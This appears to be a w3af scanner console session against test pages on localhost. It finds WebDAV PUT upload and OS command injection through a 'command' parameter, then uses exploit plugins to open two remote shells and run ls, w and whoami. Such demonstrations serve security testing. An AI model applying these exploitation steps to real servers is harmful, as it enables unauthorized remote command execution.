dz0@sock3t:~/w3af$ ./w3af
w3af>>> plugins
w3af/plugins>>> output console,textFile
w3af/plugins>>> output
Enabled output plugins:
textFile
console
w3af/plugins>>> output config textFile
w3af/plugin/textFile>>> set fileName output-w3af.txt
w3af/plugin/textFile>>> set verbosity 10
w3af/plugin/textFile>>> back
w3af/plugins>>> output config console
w3af/plugin/console>>> set verbosity 0
w3af/plugin/console>>> back
w3af/plugins>>> audit dav, osCommanding
w3af/plugins>>> audit
Enabled audit plugins:
dav
osCommanding
w3af/plugins>>> discovery serverHeader
w3af/plugins>>> back
w3af>>> target
w3af/target>>> set target http://localhost/w3af/dav/ , http://localhost/w3af/osCommanding/vulnerable.php?command=f0as9
w3af/target>>> back
w3af>>> start
Auto-enabling plugin: discovery.allowedMethods
The Server header for this HTTP server is: Apache
The URL: "http://localhost/w3af/dav/" has the following DAV methods enabled:
- COPY, DELETE, GET, HEAD, LOCK, MOVE, OPTIONS, POST, PROPFIND, PROPPATCH, TRACE, UNLOCK
Found 2 URLs and 2 different points of injection.
The list of URLs is:
- http://localhost/w3af/dav/
- http://localhost/w3af/osCommanding/vulnerable.php
The list of fuzzable requests is:
- http://localhost/w3af/dav/ | Method: GET
- http://localhost/w3af/osCommanding/vulnerable.php | Method: GET | Parameters: (command)
Starting dav plugin execution.
100% [====================================================] 2/2
Directory listing with HTTP PROPFIND method was found at directory: http://localhost/w3af/dav/ The vulnerability was found in the request with id 11.
File upload with HTTP PUT method was found at directory: http://localhost/w3af/dav/ . Uploaded test file: http://localhost/w3af/dav/FReli The vulnerability was found in the request with id 9.
Starting osCommanding plugin execution.
100% [====================================================] 2/2
OS Commanding was found at: http://localhost/w3af/osCommanding/vulnerable.php . Using method: GET. The data sent was: command=+ping+-c+6+localhost The vulnerability was found in the request with id 15.
w3af>>> exploit
w3af/exploit>>> exploit *
Using plugin: davShell
davShell exploit plugin is starting.
Vulnerability successfully exploited.
Using plugin: osCommandingShell
osCommandingShell exploit plugin is starting.
The vulnerability was found using method GET, tried to change the method to POST for exploiting but failed.
Vulnerability successfully exploited.
remoteFileIncludeShell plugin has to be correctly configured to use.
w3af/exploit>>> interact
This is a list of available shells:
- [0]
- [1]
w3af/exploit>>> interact 0
Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.
w3af/exploit/davShell-0>>> ls
FReli
KWqEDAS.asp
KWqEDAS.php
LwpHhnW.asp
QVXiV
afJNhMt.asp
bHjrb
fUWCo
kCYKq
nIJcKJd.asp
w3af/exploit/davShell-0>>> w
 22:12:40 up 9 days, 12:19, 4 users, load average: 2.49, 2.50, 2.46
USER     TTY      FROM     LOGIN@   IDLE    JCPU    PCPU    WHAT
dz0      tty7     :0       02Feb08  7.00s   1:27    0.25s   gnome-session
dz0      pts/0    :0.0     02Feb08  6days   0.44s   39.76s  gnome-terminal
dz0      pts/1    :0.0     02Feb08  7.00s   3.70s   1.15s   python ./w3af -
dz0      pts/2    :0.0     02Feb08  5:27m   0.59s   0.59s   bash
w3af/exploit/davShell-0>>> endInteraction
w3af/exploit>>> interact 1
Execute "endInteraction" to get out of the remote shell. Commands typed in this menu will be runned on the remote web server.
w3af/exploit/osCommandingShell-1>>> ls
lalal
vulnerable.php
vulnerable2.php
w3afAgentClient.log
w3af/exploit/osCommandingShell-1>>> whoami
www-data
w3af/exploit/osCommandingShell-1>>> endInteraction
w3af/exploit>>> back
w3af>>> exit
spawned a remote shell today?
dz0@sock3t:~/w3af$